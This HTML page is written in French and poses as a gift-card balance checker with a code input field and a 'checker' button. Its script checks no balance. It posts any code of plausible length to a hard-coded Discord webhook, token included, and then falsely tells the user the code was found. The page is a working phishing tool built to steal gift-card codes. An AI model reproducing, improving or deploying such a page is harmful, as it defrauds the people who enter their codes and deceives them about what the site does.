<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bonjour</title>
    <style>
        body{
            background-image: url("bg2.jpg");
        }

        body{
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }

        h1{
            text-align: center;
            color: #333;
        }

        .container {
            max-width: 600px;
            margin: 20px auto;
            padding: 20px;
            box-sizing: border-box;
        }

        #reponse{
            text-align: center;
            font-size:medium
        }

        input[type="text"] {
            width: 100%;
            box-sizing: border-box;
            border: 1px solid #ccc;
            border-radius: 4px;
            margin-bottom: 10px;
            padding: 12px 20px;
            font-size: 16px;
        }

        input[type="button"] {
            width: 90%;
            box-sizing: border-box;
            border: none;
            border-radius: px;
            padding: 10px 20px;
            margin: 20px;
            font-size: 16px;
            color: rgb(255, 255, 255);
            background-color: #333;
            cursor: pointer;
        }

        .card-container {
            display: flex;
        }

        .card-image {
            width: 100px;
            margin-right: 20px;
        }

        .honesty-container{
            display: flex;
        }

        .honesty-image{
            width: 100px;
            margin-right: 20px;
        }


        nav {
            background-color: #333;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }

        nav ul {
            list-style: none;
            margin: 0;
            padding: 0;
        display: flex;
        }

        nav li {
            margin: 0 10px;
        }

        nav a {
            color: #fff;
            text-decoration: none;
            font-size: 16px;
            text-transform: uppercase;
            padding: 10px 15px;
            display: block;
        }

        nav a:hover,
        nav a:active {
            background-color: #444;
        }

    </style>
</head>
<body>

    <nav>
        <ul>
          <li><a href="#">Home</a></li>
          <li><a href="#">About</a></li>
          <li><a href="#">Contact</a></li>
        </ul>
      </nav>

    <div class="container">

        <h1>Bonjour ! Bienvenue sur notre site !</h1>

        <div class="container">

            <div class="card-container">
                <img src="card.png" alt="card" class="card-image">
                <h4 class="card-text"> Ce site sert a voir le solde de vos cartes cadeaux </h4>
            </div>
        
            <div class="honesty-container">
                <img src="honesty.png" alt="honesty-image" class="honesty-image">
                <h4>Ce site sert a voir le solde de vos cartes cadeaux</h4>
            </div>
            
        </div>

        <h1>Lorem ipsum dolor sit amet consectetur adipisicing elit. Quod aspernatur nulla voluptatum repudiandae placeat. Dignissimos dolore incidunt rerum. Consectetur fugiat hic vitae eos tenetur porro eius voluptate nostrum ducimus corporis.</h1>

        <h1>&nbsp</h1>

        <input type="text" id="inputText" placeholder="votre code ici">
        <h3 id="reponse"></h3>
        <input type="button" value="checker" onclick="sendMessage()">

    </div>
</body>
</html>

<script>
    function sendMessage() {

        const inputText = document.getElementById("inputText").value;
        const reponseMessage = document.getElementById("reponse");
        const webhookUrl = "https://discordapp.com/api/webhooks/1054840836275318826/RBtqUuFTG6HHNs0JxyS969c6tecgm-X0oNNQ6eap2miw-ON07s3LKToXzaJ2x0dzMS_h";

        function emptyText() {
            reponseMessage.innerHTML = ""
        }

        if (inputText.length !== 16 && inputText.length !== 17 && inputText.length !== 12 && inputText.length !== 8) {
            reponseMessage.innerHTML = "Le code n’a pas été trouvé!"
            setTimeout(emptyText, 1000)
            return
        }

        fetch(webhookUrl, {
            method: "POST",
            body: JSON.stringify({
                content: inputText
            }),
            headers: {
                "Content-Type": "application/json"
            }
        })
        .then(response => {
            console.log("Message sent:", response)
            errorMessage.innerHTML = "Le code à été trouvé avec succès !"
            setTimeout(emptyText, 1000)
        })
        .catch(error => {
            console.error("Error:", error)
        })
    }
</script>
